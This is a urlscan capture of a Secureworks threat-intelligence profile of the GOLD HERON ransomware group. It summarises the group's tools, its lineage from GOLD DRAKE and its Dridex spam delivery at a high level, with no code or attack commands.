www.secureworks.com
Open in
urlscan Pro
23.100.35.118
Public Scan
URL:
https://www.secureworks.com/research/threat-profiles/gold-heron
Submission: On December 21 via api from US — Scanned from DE
Submission: On December 21 via api from US — Scanned from DE
Form analysis
2 forms found in the DOM<form><span class="fieldset">
<p><input type="checkbox" value="check" id="chkMain" checked="checked" class="legacy-group-status optanon-status-checkbox"><label for="chkMain">Active</label></p>
</span></form>
<form class="dsw-search-form">
<div class="container dsw-search-container">
<div class="dsw-search-input has-focus"><input type="search" title="Search" placeholder="Search Threat Profiles..." autocomplete="off" autocorrect="off"><button type="submit">Search</button></div>
</div>
</form>
Text Content
Cookie Notice This website uses cookies to help personalize and improve your experience. Learn more by visiting our privacy policy. By Continuing to use this site, you are consenting to the use of cookies. Close Accept Cookies Cookie Settings * Your Privacy * Strictly Necessary Cookies * Performance Cookies * Functional Cookies * Targeting Cookies * More Information Privacy Preference Centre Active Always Active Save Settings Allow All * Emergency Incident Response * Contact Us * Events & Webinars * Blog * Support * Login Try Taegis XDR * Search Secureworks * Products Extended Detection and Response Managed Detection and Response Vulnerability Management Get Started * Main Menu * Products Overview * Extended Detection and Response * Taegis™ XDR * Free Adversary Software Coverage Tool * Managed Detection and Response * Taegis™ ManagedXDR * Taegis™ ManagedXDR Elite * Vulnerability Management * Taegis™ VDR * Free VDR Buyer's Guide * Get Started * Request an XDR Demo * Request a VDR Demo * Free Trial * * * * Meet Secureworks Taegis * Extended Detection and Response * Taegis™ XDR * Free Adversary Software Coverage Tool * Managed Detection and Response * Taegis™ ManagedXDR * Taegis™ ManagedXDR Elite * Vulnerability Management * Taegis™ VDR * Free VDR Buyer's Guide * Get Started * Request an XDR Demo * Request a VDR Demo * Free Trial * Services Managed Services Security Assessments & Testing Incident Response & Readiness Get Started * Main Menu * Services Overview * Managed Services * Managed Services Overview * Taegis™ ManagedXDR * Taegis™ ManagedXDR Elite * Security Assessments & Testing * Threat Hunting Assessment * GRC Assessments * Application Security Testing * Red Team Testing * Penetration Testing * Incident Response & Readiness * Incident Response Retainer * Incident Response Services * Get Started * Talk to an Expert * Request a Quote * Emergency IR Hotline * See All Services * * * * Experienced a Breach?Contact Us Today * Managed Services * Taegis™ ManagedXDR * Taegis™ ManagedXDR Elite * Security Assessments & Testing * Threat Hunting Assessment * GRC Assessments * Application Security Testing * Red Team Testing * Penetration Testing * Incident Response & Readiness * Incident Response Retainer * Incident Response Services * Get Started * Talk to an Expert * Request a Quote * Emergency IR Hotline * See All Services * Why Secureworks Industry Leader Security Expertise * Main Menu * Why Secureworks Overview * Industry Leader * Industry Solutions * Our Customers * Awards * Security Expertise * Threat Intelligence Research * Current Threat Analysis * Practitioner Blog * Let's Talk SOC Podcast * * * * We Beat the Threat * Industry Leader * Industry Solutions * Our Customers * Awards * Security Expertise * Threat Intelligence Research * Current Threat Analysis * Practitioner Blog * Let's Talk SOC Podcast * Partners Partner Programs Technology Alliances Get Started * Main Menu * Partners Overview * Partner Programs * Global Partner Program * Solution Provider * MSSP * Cyber Risk Partner Program * Technology Alliances * Technology Alliance Partners Program * Secureworks and AWS * Secureworks and Mimecast * Get Started * Become a Partner * Password Reset * Partner Portal Login * * * * Access our Partner Portal for collateral, certification, requests for funds and more * Partner Programs * Global Partner Program * Solution Provider * MSSP * Cyber Risk Partner Program * Technology Alliances * Technology Alliance Partners Program * Secureworks and AWS * Secureworks and Mimecast * Get Started * Become a Partner * Password Reset * Partner Portal Login * Resources Resources Threat Research Knowledge Centers * Main Menu * Resources Overview * Resources * Resource Library * Webinars * Industry Reports * White Papers * Data Sheets * Case Studies * Podcasts * Blog * Threat Research * Threat Profiles * Threat Analysis and Advisories * Research & Intelligence * Executive Reports * Knowledge Centers * Knowledge Centers Overview * What is Ransomware? * What is XDR? * Endpoint Security: Enhanced Visibility via XDR and EDR * Cybersecurity Solutions * * * * Taegis™ XDR Adversary Software Coverage ToolAccess the Tool * Resources * Resource Library * Webinars * Industry Reports * White Papers * Data Sheets * Case Studies * Podcasts * Blog * Threat Research * Threat Profiles * Threat Analysis and Advisories * Research & Intelligence * Executive Reports * Knowledge Centers * What is Ransomware? * What is XDR? * Endpoint Security: Enhanced Visibility via XDR and EDR * Cybersecurity Solutions * View All... * Company About Us The Press Room Connect with Us COVID-19: Stay Secure * Main Menu * Company Overview * About Us * Corporate Overview * Office Locations * Our Leadership * Corporate Responsibility * The Press Room * Investor Relations * In the News * Events * Press Releases * Connect with Us * Careers * Partners * Open Letter to Customers * COVID-19: Stay Secure * COVID-19 Resources * Flexible Security Solutions * * * About Us * Corporate Overview * Office Locations * Our Leadership * Corporate Responsibility * The Press Room * Investor Relations * In the News * Events * Press Releases * Connect with Us * Careers * Partners * Open Letter to Customers * COVID-19: Stay Secure * COVID-19 Resources * Flexible Security Solutions * * Secureworks Cited as a Leader in The Forrester Wave™Read the Report * * Contact Us * Events & Webinars * Blog * Support * Login Close 0 Results Found * PRODUCTS * PRODUCTS, SERVICES & SOLUTIONS * INSIGHTS * ABOUT * CONTACT * OTHER Back To Results * Close Try Taegis XDR * Threat Profiles * GOLD HERON THREAT PROFILES Search Profiles (1) Close Filters THEMATIC AREAS China Cybercrime India Iran North Korea Pakistan Palestine Russia South Korea United States Vietnam OBJECTIVES Botnet Operation and Sales Business Email Compromise Espionage Financial Gain Hacktivism PCI Theft Ransomware Sabotage Spam Delivery Surveillance CYBERCRIME GOLD HERON ObjectivesFinancial Gain, RansomwareAliasesToolsCobalt Strike, DoppelPaymer, Dridex, PowerShell Empire GOLD HERON is a group of financially motivated cybercriminals responsible for the distribution of the DoppelPaymer and Grief ransomware families. CTU researchers assess with moderate confidence that GOLD HERON is comprised of former operators from the GOLD DRAKE threat group. At the time of the split, GOLD DRAKE operated both the BitPaymer ransomware and Dridex botnet and GOLD HERON is thought to be in possession of the source code for both malware families. GOLD HERON adopted the name DoppelPaymer for their ransomware after security researchers used the moniker to refer to it publicly. Intrusions largely rely on the modified Dridex malware, colloquially referred to as Dridex 2.0, for both initial access and lateral movement. GOLD HERON uses spam emails, sometimes delivered using the Cutwail v2 botnet, to deliver Dridex onto victims' networks. Frequently, PowerShell Empire or Cobalt Strike are deployed into the environment to augment the capabilities of Dridex. Tools Taegis™ XDR Adversary Software Coverage Tool Detections and countermeasures for adversary tactics and techniques mapped to MITRE ATT&CK v9 White Papers The Impact of XDR in the Modern SOC ESG research reveals what organizations want out of XDR Webinars Is XDR the Answer? Improving Your Security Program With or Without a SIEM Discover how XDR can improve detection and response times, whether you use it as a complement, or alternative to SIEM. * * * * * Careers * RSS Feed * Email Subscription * Sitemap * Privacy Policy * Supply Chain Transparency * Terms & Conditions * Accessibility Statement * Dell Technologies * Unsubscribe * Cookie Settings English * 日本語 © 2021 Secureworks, Inc.